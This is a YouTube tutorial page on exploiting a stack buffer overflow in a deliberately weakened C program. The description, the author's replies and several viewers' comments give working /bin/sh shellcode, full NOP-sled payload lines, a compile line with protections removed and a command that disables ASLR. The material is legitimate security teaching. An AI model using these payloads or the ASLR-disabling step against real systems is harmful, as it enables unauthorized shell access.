How to exploit a buffer overflow vulnerability - Practical

272,012 views

Daniel Slater

9 years ago

This tutorial goes over the basic technique for exploiting a buffer overflow vulnerability, with a worked example.
It assumes that you already have basic C knowledge, gdb and gcc installed, and an understanding of how programs represent memory.
The source code for the program can be downloaded at
drive.google.com/file/d/0B8b0M2LATseXYWRiVHdkaGhwRjg/view?usp=drivesdk&resourcekey=0-ZRMkh5rVq_hvXW6Nb-cb6A
The 46-byte shellcode (x86*) used in this program is "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
The compile line is: gcc -o example -fno-stack-protector -m32 -z execstack example.c
-fno-stack-protector === Removes the canary value placed after the buffer (the stack protector)
-m32 === Compiles the program as a 32-bit binary
-z execstack === Makes the stack executable
NOTE: If this tutorial is not working, it is likely that you have ASLR enabled. To disable it, run the following command in your terminal:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
When you are finished, I strongly recommend you turn it back on with the command:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
If you enjoyed this tutorial and want to see more then please consider buying me a coffee! www.buymeacoffee.com/langotto. Definitely not required, but it definitely will be appreciated!
* If your computer uses ARM then this won't work. If you don't know what this means: as of 2021 it should work unless your machine is a Raspberry Pi, a phone, or an Apple computer released after 2020.

Comments: 262
@danielslater 2 years ago
My course "Ethical Hacking: Pentesting and Securing Web Applications" is 90% off for the next 5 days! www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?couponCode=NEWYEAR2022 Sign up today for $10!
@khaelkugler 9 months ago
Or just do PortSwigger labs
8 years ago
TL;DR. Most of you will get something like "Cannot access memory at address 0x....". That's because you have a 64-bit system installed. To get this to work, use the $rsp register instead of $esp.
@danielslater 8 years ago
Another way around this is to use the compiler flags I've included in the description. One of them is -m32, which compiles it as a 32-bit program.
@cyancoyote7366 8 years ago
I wouldn't have thought I'd run into a Hungarian here, but oh well.
@douglastorrance2922 8 years ago
thx
@motorheadbanger90 6 years ago
why not compile with the -m32 flag? convert it to 32 bits
@shell2673 5 years ago
At the end of the example I get "Program received signal SIGSEGV, Segmentation fault"... how come?
@annablendermann 6 years ago
This really helped me understand the details of buffer overflows, thanks!
@vcm9837 7 years ago
This is a really good video. Thanks for the work. One question: what is the return address? Is that the same thing as the memory address?
@fredxu9826 8 years ago
Hello Daniel, thanks for the great tutorial! I am new to this topic, so the question might be basic. I have a question regarding the shellcode we want to execute in the end. What is '/x90' * 222? And after we add the shellcode we want to execute, why do we add '/xd0/xce/xff/xff'?
@danielslater 8 years ago
+xu zeyuan Firstly, thanks for the compliment and I'm glad that you enjoyed it! '/x90' represents the hexadecimal encoding of the 'no operation' operation, which in security is commonly referred to as a NOP. 'x90' is a NOP in assembly, and we want to place as many as we can: if we put our shellcode (code that 'pops a shell') after our NOPs, then if we start executing anywhere in our series of NOPs (commonly referred to as a NOP sled) it will keep running NOPs (doing nothing) until it reaches our actual code. '/xd0/xce/xff/xff' refers to the memory location that we want to 'jump to' so that we can execute our code. We put it at the end as we are overwriting the stack pointer, which dictates which piece of code will be run next. If you want to know more I recommend my buffer overflow theory video.
@purnact3741 8 years ago
I didn't understand that shellcode. How do you write it?
@danielslater 8 years ago
Shellcode isn't something that you actually have to write for yourself; it is fine to just get it from online resources. Unfortunately I don't have any videos on shellcode or any good resources I can point you to, but a brief description is that it's machine code translated into hexadecimal, commonly with the goal of 'popping a shell', or in other words gaining the privilege level of the running program.
@paulifea7072 5 years ago
I'm in the midst of understanding buffer overflow, thank you good sir for sharing this awesome tutorial. I do have a few questions though: 1) Is this tutorial assuming that ASLR is enabled? 2) Also, I see a "push %ebp" instruction, followed by a "sub $0x110, %esp" instruction in your disassembled main function. Correct me if I'm wrong (my understanding of assembly code is very limited), but does that mean that the EBP gets pushed onto the stack, before the ESP shifts by 0x110 bytes (272 bytes) below the EBP register? 3) If so, can't I just find the memory address of the buffer (p &buffer command), add 0x110 bytes + 0x4 bytes(size of EBP register) to that memory address to find the exact location of the return address, and then overwrite that return address to point to an address that's above it, ie address of buffer + 0x110 bytes + 0x4 bytes(size of EBP register) + 0x4 bytes(size of return address)? Once again, thank you for sharing this video! (:
@yan793 3 years ago
Hi sir, I am following all the steps, but my computer shows me "stack smashing". Can I know why my terminal shows different things to me?
@kevin.afton_ 8 years ago
I did everything as in the description. I have Kali Linux, I get a segfault at 260, but after feeding the payload to it I can't get a bash, just another segfault. Turned off ASLR, canary, stack protection. By the way, the +'BBBB' trick won't work for me either. If I do run $(python -c "print('A'*256 + 'BBBB')"), I still get 'A's: Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () If I do run $(python -c "print('A'*257 + 'BBBB')"), I get: Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () This is my payload: run $(python -c "print('\x90'*214 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x10\xf0\xff\xbf')") I even tried to increase the stack address to '\x50\xf0\xff\xbf' but still get a segfault. ==================== OK, I recompiled the code on an Ubuntu and I got the same results as you! :) I wonder what protection Kali can have that Ubuntu hasn't?
@markrayne5382 5 years ago
What version of Ubuntu did you use? I'm using Ubuntu 16.04 LTS and it won't work for me; I am getting the exact same result as you did with Kali.
@niektuytel7861 5 years ago
A question: the /command, how does this work????
@salimbelarbi1776 7 years ago
Hello, I have an exam this Monday and I am completely lost, please! Can you answer my questions: Question 0 What is the fault? What is the purpose of this service? Which versions are vulnerable? What version did you use? Question 1 What protections against this attack Question 2 !!! Structure of the stack just before the overflow Question 3 !! Structure of the string sent to overflow Question 4 !!! Structure of the stack just after the overflow Question 5 !! Where does the new return address point? How is it determined? Question 6! What code is at this address Question 7! What happens to the Shell code? Question 8 What does the Shell code do? Question 9 What does your attack do? Which file is introduced on the victim? How? What action does this file take? how?
@mangoKush12 7 years ago
Salim BELARBI did you pass your exam??
@theone4808 2 years ago
Nice
@jamessn91able 4 years ago
$esp doesn’t work and neither does $rsp . I keep getting “No registers.”
@dane887 3 years ago
You have to quit after you copy. After you run blahblahblah. Then you disas main. You get your number, copy then quit. Open again then break *yournumber.
@mohamedwaellabidi9461 2 years ago
Macchanhzr 00:56:28:93:37:88
@mohamedwaellabidi9461 2 years ago
Vim
@AtlasMTBRider 5 years ago
To anyone getting "Cannot insert breakpoint 1. Cannot access memory at address xxxxxx": the memory addresses displayed when you run disassemble main at first are not correct. To get the correct ones, run the commands as follows:
gdb ./example
run aaaaawhatever
disassemble main
Now you get the correct ones; copy it and quit gdb.
gdb ./example
break *the address you copied
Now running the command (run $(python ........)) will work. Thanks for the video :)
@bedoce2599 5 years ago
Thank you!
@egeyolsal2647 5 years ago
i love you
@annapooranisnoolagam 5 years ago
it worked.. Thank you :)
@greycrow123 4 years ago
Why though? Why execute run? How does it reform the address values?
@rohankhandelwal7681 4 years ago
may god increase your life by (the same address which i copied) years
@RealKalleAnka 8 years ago
I must say, this is the best video tutorial I have come across explaining how to exploit a buffer overflow. Well done!
@haransivaram1847 6 years ago
I concur!
@b213videoz 4 years ago
I agree, the author even managed to explain the "little endian" bit even though he said he wouldn't explain that :-)
@shubhamshah3023 3 years ago
Ran the code with the flags you mentioned in the description but still facing the same issue of "cannot access memory at address". I am using the Kali Linux 32-bit version in VMware. Disabled ASLR. Any solution would be highly appreciated.
@pitkes159 10 months ago
Don't forget to use python 2 not 3. Otherwise the NOP sled will not be created correctly!
@kooners6961 3 months ago
So I almost made it. Now it does attempt to spawn a shell, but I always end up getting a segmentation fault. I did compile it without stack protection to get it to work. For whatever reason, I can't get Linux shellcode to work or launch.
@nutritionalyeast7978 5 years ago
Whenever I set breakpoints in gdb and run, the gdb process just quits? It says "[1]+ Stopped gdb ./[filename]" with no other errors. I've tried disabling ASLR in a number of ways so I'm not sure why this is happening
@busyhacker63 4 years ago
mine quits like yours
@theish189 4 years ago
Same
@cursedfox4942 28 days ago
Love this; would have loved a little more explanation on the shellcode though, would have gladly watched for 30 mins.
@pennysmith5903 5 years ago
this might be the best tutorial ever, but I still couldn't understand my security homework
@abdulmuizzkelani3760 4 years ago
I hope you have been able to figure it out cos I'm still struggling with mine 😊
@rixlayer 4 years ago
Ah, finally, a comment I relate to.
@abdulmuizzkelani3760 4 years ago
@@rixlayer lol, looks like you were given an assignment on buffer overflow also
@JosephShapiroTech 5 years ago
I followed along and everything is the same for me (the addresses etc.). My output at the end even looks the same, EXCEPT that I get a segfault instead of executing bin/sh (which shows in the nonsense output similar to how the video shows). Any tips as to why this might happen? I am on an Ubuntu VM. I compile with the command shown in the description and ASLR is off. Any advice is appreciated!
@theresa4919 5 years ago
I have the same problem (just commenting to get notified about eventual answers).
@Hermaeus7 3 years ago
Bump for the same issue. Prints out "....gibberish.../bin/sh...gibberish.." then segfaults.
@purnact3741 8 years ago
Bro, great one. Actually you have shown something practically done here. But I got some doubts. Firstly, I didn't properly understand the shellcode concept. Where does it come from? What does it (/x30, /x40, x50... etc.) mean? Will it do the same functionality in every system (I mean any OS)? I have seen the description in the comments but didn't get it though. And I have a few more; I will ask them once I've watched the video again carefully. Thank you
@danielslater 8 years ago
Shellcode is machine code that is 'compiled' to hexadecimal, commonly with the intention of 'popping a shell', or in other words gaining the privilege level of the program.
Where does it come from? It is written by the hacker, usually with the intention of 'popping a shell'.
What does it (/x30, /x40, x50... etc.) mean? These are hexadecimal values that can be converted into processor instructions (if this doesn't make sense then do a bit of research on machine language).
Will it do the same functionality in every system (I mean any OS)? Interesting question with an interesting answer! Machine code is instruction set dependent and therefore depends on the architecture of the CPU. The most common types you will run into are x86 (almost every desktop and laptop) and ARM (almost everything else). So in answer to your question, it depends on the CPU, not on the operating system, so if you write shellcode for a phone it most likely won't work on a computer and vice versa.
Hopefully that clears things up a bit.
@sorrefly 3 years ago
You should use GDB to inspect the code and have an idea about the possible attack, but since it inserts extra variables for debugging purposes, you'll have to deal with the offset introduced.
@kooners6961 3 months ago
The error says "cannot insert breakpoint 1" and "cannot access memory at address: (address name)".
@ayanoayumu3764 8 years ago
Thank you so much man. This video saved me on a homework assignment!
@craimucha7920 2 years ago
So, is all hacking done either through fuzzing or disassembling, basically? What do ethical hackers do when they encounter a closed source program? Thank you for the videos! You got a subscribe from me.
@danielslater 2 years ago
Funnily enough that’s not even 10% of what ethical hackers do! There’s also: setting up honeypots, various types of injection, social engineering, identifying broken access controls, insecure databases, client side vulnerabilities and a lot more! I get this question a lot so I made a course to give a more complete overview of what ethical hackers do! If you’re interested check it out www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?referralCode=EE1801B01FC71B33E54F
@kooners6961 3 months ago
At the end it spawns, then says "inferior 1" and exits normally.
@danielslater 3 years ago
My Udemy course is 90% off for the next 5 days! www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?couponCode=SHOUTOUT
@himiker 5 years ago
Everything seems to work, except at the end the "/bin/sh" program isn't run. I get the following instead:
Program received signal SIGILL, Illegal instruction. 0xb7e30a00 in __libc_start_main (main=0x804844d , argc=3, argv=0xbffff0a4, init=0x8048490 , fini=0x8048500 , rtld_fini=0xb7fed180 , stack_end=0xbffff09c) at libc-start.c:246 246 libc-start.c: No such file or directory.
I also get this message when looking for the edge of the buffer: run $(python -c "print('A'*268 )")
I know this is an old post, but if anyone has any ideas, I would greatly appreciate it.
@mathssoso4261 6 years ago
How did you create the pre-prepared shellcode?
@seiv- 3 years ago
msfvenom:)
@yaseen7749 2 years ago
Thanks man, I got a reliable shellcode from your description. I was bugging my head for not spawning a new shell with my shellcode. It worked like a charm with your shellcode.
@liszt6832 5 years ago
What does "call" exactly mean? Calling a function we know? I still didn't understand what you mean.
@liszt6832 5 years ago
I didn't understand why you typed in x/200xb; why 200? Could someone explain?
@d1rtyharry378 5 years ago
The first x means examine, the second one means hexadecimal format and b means byte. So basically the command says examine and print 200 hexadecimal-format registers, each of a size of a byte.
@Arkata 3 years ago
Dude! Thank you!!! I'm studying for the Security + and I didn't understand the concept of Buffer Overflow because I couldn't picture it but thanks to your video I gained better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming. Thanks lots mate!!!
@kooners6961 3 months ago
Almost have it, but it just won't spawn
@mohamedwaellabidi9461 2 years ago
No-ip
@wishmaster7062 8 years ago
Hello, I have a question. In this tutorial we can observe the address of the buffer start on the stack, to which we're going to ret from the strcpy after we overflow the stack inside that function; it is 0xffffced0, right? But isn't this address going to be different each time? I mean, the OS is placing the stack start address differently each time (or not?). So if the system placed the stack at some other address, that shellcode wouldn't work. Am I right or not? Great tutorial by the way!
@danielslater 8 years ago
Awesome question! I'm glad you asked. So there is a lot going on here, and because this is the classical hack, OSes have evolved to make it harder. The thing that you're mentioning is called ASLR (to learn more about this check out my other security video called Common Computer Security Hurdles), which works to randomise where the memory is going to occur. This means we effectively need two vulnerabilities (one that allows us to view where the memory is) to allow us to use this technique. ASLR isn't the only thing working against us though: this can easily be turned off, and then just from other programs executing the stack can change and the memory that is executed can change. The thing that makes this okay is that it typically doesn't move much if we do the tasks in close succession. This is also one of the key reasons why we need a NOP sled. So you are completely right that it is a problem, but it can easily be circumvented.
@wishmaster7062 8 years ago
+Daniel Slater thanks for the answer, looking forward to your videos
@JohnnyDepp-zu1if a year ago
Is there a course on Udemy, or one that you know of, that can teach me more about this in depth? What is this called, buffer overflow exploitation?
@jaeun91 6 years ago
When I try to find the size of the buffer, I get: Program received signal SIGSEGV, Segmentation fault. _IO_fgets (buf=0xbfffe847 "", n=9, fp=0x0) at iofgets.c:50 50 iofgets.c: No such file or directory. What am I doing wrong?
@문예진-b7x 4 years ago
In the end I get 'Program received signal SIGILL, Illegal instruction'. I don't know what the problem is...
@am566-h7m 7 years ago
Hello, nice video. But I keep getting the error "/bin/bash: ..... : Argument list too long" "bin/bash:... : Success". What can I do to avoid this error?
@annoymousko288 2 years ago
In the end why is it showing random characters?
@HaqAhmed 2 years ago
Hi there, what if there are no call functions, but you still want to put a breakpoint under strcpy? Can you put a breakpoint on any of them or does it have to be specifically under a call function?
@wolfcompany2 3 years ago
I got this when I run disas main:
(gdb) disas main
No symbol table is loaded. Use the "file" command.
@prudhviraj4358 7 years ago
Hey Daniel Slater!! I got the return address 0x41414141 at $(python -c"print('A'*260)") itself, but when I use $(python -c"print('A'*256+'BBBB')") I get the return address as 0x41414141. If I try with 262 or something then I am getting a constant address of 0x0804848a. Where am I going wrong? Why am I not getting 0x42424242 as the return address?
@danielslater 7 years ago
Two things: 1. Are you using the correct flags? 2. If 'A'*260 returns 0x41414141 it either means there has been an extreme coincidence (that will never occur unless the program is actually designed for that to occur, but that's a discussion for another day) or 4 of your A's are already overwriting the buffer. Because of this, if you try with 262 it shouldn't work, because we know that the return address is somewhere between 0 and 260. If on 256 it still prints 0x41414141 then try 252 and move down in increments of 4 until it returns 42's.
@prudhviraj4358 7 years ago
Hey Daniel Slater, I used all the flags and also disabled ASLR. I have found that my return address is 4 bytes and located at the 112th, 111th, 110th, 109th positions. I have concluded this by using the command run $(python -c"print('C'*111+'A'*20+'B'*129)"). When I run this I get the error saying 0x41434343. Now how should I proceed further with this information?
@prudhviraj4358 7 years ago
I then used this command: run $(python -c "print('\x90'*108+'\x00\xcf\xff\xff'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x90'*102)") and then it says the process exited normally, but there is no root shell granted. Where am I going wrong?
@danielslater 7 years ago
Look at my off-by-one video and hopefully you'll learn what happened then. The buffer is definitely not at 109, given that the buffer is 256 bytes long. Unless there is a bug in the C compiler (that is triggered by basic problems) you're overwriting part of the return address but not the full thing.
@prudhvi5313 7 years ago
Daniel Slater, I succeeded in accessing the bin/sh... the above print command with the shellcode works!!! Thank you so much dude!!! This is the best tutorial ever.
@Henry_the_knight a year ago
This tutorial is amazing. Thank you so much for the work you put into it
@harbaapkabaap2040 5 years ago
You didn't mention that one needs to make the stack executable for this, with the -z execstack option to gcc while compiling. I found that out the hard way, but thanks for the video, it is very informative.
@mohamedwaellabidi9461 2 years ago
Add 2 eip
@pberson 8 years ago
Great job at really explaining buffer overflows and how to exploit them.
@alex595659 9 months ago
How do you know the return address?
@anamoly01 3 years ago
If he could provide a source to study that little endian trick, that would be awesome.
@RivenbladeS 6 years ago
At 3:34 I have 4 bytes different and then it starts like \x41 \x41 ... example: \x03 \xd1 \x00 \x21 \x41 \x41 ... Does this affect the address 0xffffxde0 somehow? Should I subtract something?
@novanuke1356 3 years ago
This was great! I do have to say that the clicking was a little distracting. I guess it was a laptop? Maybe a mic off of Amazon would increase the quality of your videos.
@muhitmustakim9399 6 years ago
Hi Daniel, thanks for the nice video. When I run from gdb I get the message below:
process 5989 is executing new program: /bin/dash Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x8048471
When running the executable I get the error below:
�����/bin/sh���� Segmentation fault (core dumped)
Any idea why?
@moshe6501 7 years ago
Using Ubuntu 64-bit... Not sure how this affects the process, but I was not able to override the address of the segmentation fault with the 'A' input...
@danielslater 7 years ago
Can you confirm that you compiled with the relevant flags and turned ASLR off?
@moshe6501 7 years ago
It seems to do with the stack canaries state at the default compiling...
@danielslater 7 years ago
Here is the compile line from the video description: "gcc -o example -fno-stack-protector -m32 -z execstack example.c"
@sanhitaguha1135 5 years ago
@@danielslater I get the same error. I have compiled using -m32 and turned off ASLR.
@ExposedExpert 3 years ago
@@sanhitaguha1135 Were you able to write the 'A's? As I am having issues with that.
@lubangrololol2217 3 years ago
Hi, I wanted to ask if the shellcode you used is universal for every system, because I followed the tutorial exactly and in the end the random non-printable characters appeared, but I still received a segmentation fault and no shell opened. But maybe this has a different cause; I really just started getting in touch with this kind of exploit.
@eliddell1 6 years ago
Late to the game here, but I am not getting a shell and can't understand why my output shows //shh/bin instead of /bin/sh. Can you help?
@drwombat 2 years ago
How did we go from a simple C(++?) program to the Python stuff... Are we passing the output of the Python back into the C program? That's not really explained well here.
@danielslater 2 years ago
It's a C program; the reason we use Python is that we're crafting an input for the C program. We could have typed over 200 A's, but it makes sense to use automation where we can.
@liwaiyip1769 5 years ago
No matter how I change the value of 'A' * num to 250, 260 or 1000, I cannot obtain something like 0x41414141. It just shows some normal address like: 0xb7f26411 in __kernel_vsyscall(). How should I proceed? :(
@moviez1794 4 years ago
Hello! Have you got a solution to this problem? Got the same.
@gauravchauhan3832 3 years ago
I tried your method, copied every step, but wasn't able to do it... Why so? Can anyone answer? Is gdb or gcc doing something? Or is there any other reason?
@danielslater 3 years ago
When asking for debugging help it's useful if you include information about what commands you're running and whether anything about your setup is non-standard. Currently it's impossible to give you useful advice.
@user-yn4nj2ik9h 3 years ago
What should I do if my esp starts in the middle of an address and not at the start of the line?
@Makingfinancialdecisions 2 years ago
I am new to these concepts and this process. With that being said, is this the command prompt for Ubuntu?
@danielslater 2 years ago
Yes it is
@markrayne5382 5 years ago
Hi Daniel, first off great tutorial :) I seem to be getting an error like most people on here; like another user, prud, says: "I got the return address 0x41414141 at $(python -c"print('A'*260)") itself but when I use $(python -c"print('A'*256+'BBBB')") I get the return address as 0x41414141." This exact thing is happening to me. I went down in multiples of 4, but when I did I got no seg fault; the seg fault only occurs when the total value is 260. Any idea why? Thanks (note my ASLR and stack protector are turned off)
@toolsx8677 5 years ago
Hi Daniel, I am trying, but can someone please tell me where the memory address converted to little endian comes from? How did you get this address?
@Kimberly-zz4te 6 months ago
This was so confusing. I don’t understand this.
@aneelasafdar7278 6 years ago
I use \x90 with the assumption that it will be stored as a single byte in memory, but it doesn't. It gets stored as it is, with hex values 3039785c. Even a file storing this input or shellcode also takes more memory than the exact number of bytes in it. I am on a 64-bit machine and compiling the program using -m32.
@danielslater 6 years ago
I've addressed this in other comments, but you have to think about how memory is stored in C. The short explanation is that padding is added to memory to make it more efficient to access.
@John_X_GR 6 years ago
Hello Daniel :) Can I ask you one thing? Why is your stack, or disas main, different from mine? Firstly, I tried to compile with your line, both with my Ubuntu Linux and my Kali Linux, but both of them, when compiling, said different .h files were missing on each of them, for which I installed the corresponding libraries. Both of them worked fine, but both of them have a different stack or disas main from yours... why's that? I didn't try to go further from there, because I don't know assembly code and don't know any further. Please can you help me? Or do you know why that is, or is it natural?
@markrayne5382 5 years ago
Same here, did you fix the problem?
@liviomichaelmelatti8236 7 years ago
Can I see a screenshot of what your shellcode looks like in memory? x/100xb 0xbfff070 or something like that, with the shellcode in there?
@mancubius 3 years ago
For what kind of architecture is this shellcode?
@danielslater 3 years ago
TLDR: 32-bit x86. Excellent question. When I made the video x86 was the dominant architecture and it didn't seem like ARM was going to be anywhere near where it is today, so I didn't even think of other architectures. It's x86 on a 32-bit virtual machine running on a 64-bit Mac.
@mancubius 3 years ago
@@danielslater Wow, thank you for your prompt reply! I was testing it myself last night on a Kali Linux 2020.4 64-bit. I am using Windows 10 64-bit on an Intel i9-9900K, also running in a virtual machine, so I was wondering: when I am looking for shellcode exploits, what should I look for? Do I need to install a 32-bit Linux? If I do so, do I need shellcode which targets the OS of the virtual machine?
@dejanahmetovic612 6 years ago
Hello, while using GDB I am not able to see the function names on the right hand side, ex. . Any help on how to get that there?
@danielslater 6 years ago
So maybe what I've got there is a bit deceptive, because it's an exceptionally simple example. The reason strcpy comes up is because it's an inbuilt call; if you create your own function and call it, then you can't get the name from the executable because it's simply not stored (it's possible there are compiler flags you can use to get it to store them, but not that I know of). If you're interested in learning more about reverse engineering I'd recommend doing an online course in it, or writing your own simple programs and disassembling them to start seeing basic patterns. If you take the second approach I'd recommend looking a bit more into compiler flags, because there can be tricks like inlining which could throw you off.
@b00i00d 4 years ago
disas, lol This term could be straight outta hip hop...
@mohamedwaellabidi9461 2 years ago
Buy somethibg
@mohamedwaellabidi9461 2 years ago
Memory corruption
@anuraagsinha9447 7 years ago
You need to compile this with debugging options, correct? On any system you're trying to hack they obviously aren't going to give that to you, so do people just use trial and error in order to find their memory locations?
@westernvibes1267 4 years ago
Hello script kiddies. This is a hacker.
@eliddell1 6 years ago
Can you explain how to write the shellcode?
@srcmake 6 years ago
Great explanation, and concise example. Thanks.
@user-11528 3 years ago
Why is my machine code twice as long as yours?
@miloradowicz 6 years ago
Can you actually execute code in the stack segment? Isn't there supposed to be a protection that separates code from data and won't allow the latter to be treated as the former?
@mohamedwaellabidi9461
@mohamedwaellabidi9461 2 years ago
Change icon
@Beulzabob
@Beulzabob 7 years ago
Great explanation. Thank you for the details!
@mohamedwaellabidi9461
@mohamedwaellabidi9461 2 years ago
Nano
@mohamedwaellabidi9461
@mohamedwaellabidi9461 2 years ago
Call
@mohamedwaellabidi9461
@mohamedwaellabidi9461 2 years ago
Jmp
@DS-mg8zx
@DS-mg8zx 6 years ago
Thank you so much for this! Practical and easy to understand.
@droslean1
@droslean1 7 years ago
Hey Dan, nice example. But for me it's not working. I get: Program received signal SIGSEGV, Segmentation fault. 0xf7e68929 in ptmalloc_init.part () from /usr/lib32/libc.so.6 Any ideas?
@danielslater
@danielslater 7 years ago
Can you confirm that you used the compile line in the video description? I'm willing to bet that's a canary.
@droslean1
@droslean1 7 years ago
Yes. I compiled it that way.
@kooners6961
@kooners6961 5 years ago
So I got the -m32 to work, but I still can't insert breakpoints one and access the address
@bhavitarunch5539
@bhavitarunch5539 6 years ago
I am getting "no such file or directory" when I use gdb ./example
@danielslater
@danielslater 6 years ago
Learning this type of security if you have no programming background is impossible. I'd strongly recommend learning some basic C before trying to broach low-level security.
@niyazmurshed
@niyazmurshed 8 years ago
Hey, sorry to ask so many ques.... I get the following after running.... /bin/dash: 0: Can't open ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[1��C��C � ��S �����/bin/sh���� [Inferior 1 (process 9130) exited with code 0177] Any idea what could be the prob?
@danielslater
@danielslater 8 years ago
Are you running this in gdb?
@karimbarakat7732
@karimbarakat7732 4 years ago
Excellent explanation, thank you. Can you advise on how you developed the machine code that you ran to get the shell to start?
@danielslater
@danielslater 4 years ago
The way that most people do it is they have a list of around 10 shellcodes for various situations, most commonly: a really short one for really small buffers, a very reliable one when the buffer is large, and several which don't contain characters which are often escaped. If you still feel the need to make your own then you can write basic programs in a compiled language (I'd recommend one with few abstractions, such as C), and use "objdump -d /path/to/compiled/program".
@RivenbladeS
@RivenbladeS 6 years ago
At 6:37, how do I make my injection program compile to hex bytes?
@melledijkstra5543
@melledijkstra5543 7 years ago
What if the stored input is much smaller, like $(python -c "print('A'*28+'BBBB')")? The shell code is 46 bytes. He subtracts it from the 268 (in my case 28). That doesn't fit, right?
@danielslater
@danielslater 7 years ago
Yeah, that doesn't fit. In reality you need a pretty large buffer, because without a NOPSLED you'll need either a lot of luck or a lot of attempts to actually get the right starting address.
@melledijkstra5543
@melledijkstra5543 7 years ago
Daniel Slater Or maybe I need smaller shellcode? I don't need to get a shell though, just need the contents of a file which I can't access (for a challenge, just to be clear). This should be possible with smaller shellcode, I guess. But I'll need to write that myself somehow. Do you have any tuts on how to do that? Thx for the video!
@danielslater
@danielslater 7 years ago
It's probably worth going into how to write shellcode. I don't have any videos on it, but it shouldn't be too hard to find.
@kylin3197
@kylin3197 7 years ago
What do you do if you try this for a different program and don't find a bunch of 41's?
@danielslater
@danielslater 7 years ago
Unfortunately this is out of the scope of this YouTube channel, as the answer gets extremely long extremely fast. A lot of security is knowing a lot of techniques for doing something and hoping one works, so I would suggest doing a full pen testing course.
@thomasathanasiou1661
@thomasathanasiou1661 7 years ago
Is there an assembly code that produces the shellcode that you used?
@danielslater
@danielslater 7 years ago
I don't have it readily available, but if you want I'm sure you could convert it pretty quickly. Shellcode is the sort of thing that is good to write a few times to get an idea of what it actually is and what's happening, but most people just get stuff online because there really isn't any benefit to writing it yourself. If you want to look at example shellcode and the conversion then check out this link: shell-storm.org/shellcode/files/shellcode-827.php
@shell2673
@shell2673 5 years ago
msfvenom
@mikemazza404
@mikemazza404 4 years ago
Hi Daniel, thank you for posting this video, this is very helpful. I do have a couple of questions for you though. 1) Have you posted the programs so that people can recreate this exercise on their own? If not, which programs are needed? 2) Do you have another video/tutorial on how to secure against a buffer overflow exploit? Thanks in advance!
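On the second question, the fix at the source level is the one the tutorial's compile flags deliberately undo the compensations for: do not let the copy length be decided by the attacker's input. Below is an added example, not the video's example.c (which is only linked from the description), showing the unchecked `strcpy` shape the tutorial exploits next to a bounded copy that refuses input which does not fit. `BUF_SIZE`, the function names and the 'A'-filled probe arguments are this example's own assumptions.

```c
/* Added example: the unchecked strcpy pattern beside a bounded, fail-closed
 * replacement. Not the tutorial's own source file. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 256   /* assumed buffer size for this example */

/* Vulnerable pattern: strcpy copies until it finds a NUL, so an argument of
 * BUF_SIZE bytes or more runs past buf into the saved frame pointer and the
 * return address above it. Kept only to show the shape of the bug; nothing
 * else in this example calls it with untrusted input. */
void copy_unchecked(const char *input)
{
    char buf[BUF_SIZE];
    strcpy(buf, input);                 /* no bound: classic stack overflow */
    printf("%s\n", buf);
}

/* Hardened: look for the terminator within the destination's capacity before
 * copying anything, and fail closed when it is not there. Returns 0 on
 * success and -1 when the input does not fit (terminator included). */
int copy_checked(const char *input, char *out, size_t out_size)
{
    if (input == NULL || out == NULL || out_size == 0) return -1;
    const char *end = memchr(input, '\0', out_size);   /* scans at most out_size bytes */
    if (end == NULL) return -1;                         /* no NUL within capacity: too long */
    size_t n = (size_t)(end - input);                   /* n <= out_size - 1 */
    memcpy(out, input, n + 1);                          /* copy text plus terminator */
    return 0;
}

/* Same fixed-size stack buffer as copy_unchecked, wired to the bounded copy.
 * Returns 0 when the argument was accepted and printed, -1 when rejected. */
int handle_argument(const char *input)
{
    char buf[BUF_SIZE];
    if (copy_checked(input, buf, sizeof buf) != 0) {
        fprintf(stderr, "rejected: argument must be shorter than %d bytes\n", BUF_SIZE);
        return -1;
    }
    printf("%s\n", buf);
    return 0;
}

/* Builds a constructed argument of `len` 'A' bytes (the same filler the
 * tutorial uses to find the overflow) and reports whether handle_argument
 * accepts it: 0 for lengths below BUF_SIZE, -1 from BUF_SIZE upward. */
int probe_length(size_t len)
{
    char *arg = malloc(len + 1);
    if (arg == NULL) return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    int rc = handle_argument(arg);
    free(arg);
    return rc;
}

int main(int argc, char **argv)
{
    return handle_argument(argc > 1 ? argv[1] : "hello") == 0 ? 0 : 1;
}
```

The design point is that the bounded version never reads or writes beyond `out_size` and returns an error rather than truncating silently, so a caller cannot end up processing a half-copied value. The stack protector and non-executable stack that the description's `-fno-stack-protector` and `-z execstack` flags remove are still worth leaving on: they are defence in depth for the copies you did not notice, not a substitute for bounding the ones you did.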
@pberson
@pberson 8 years ago
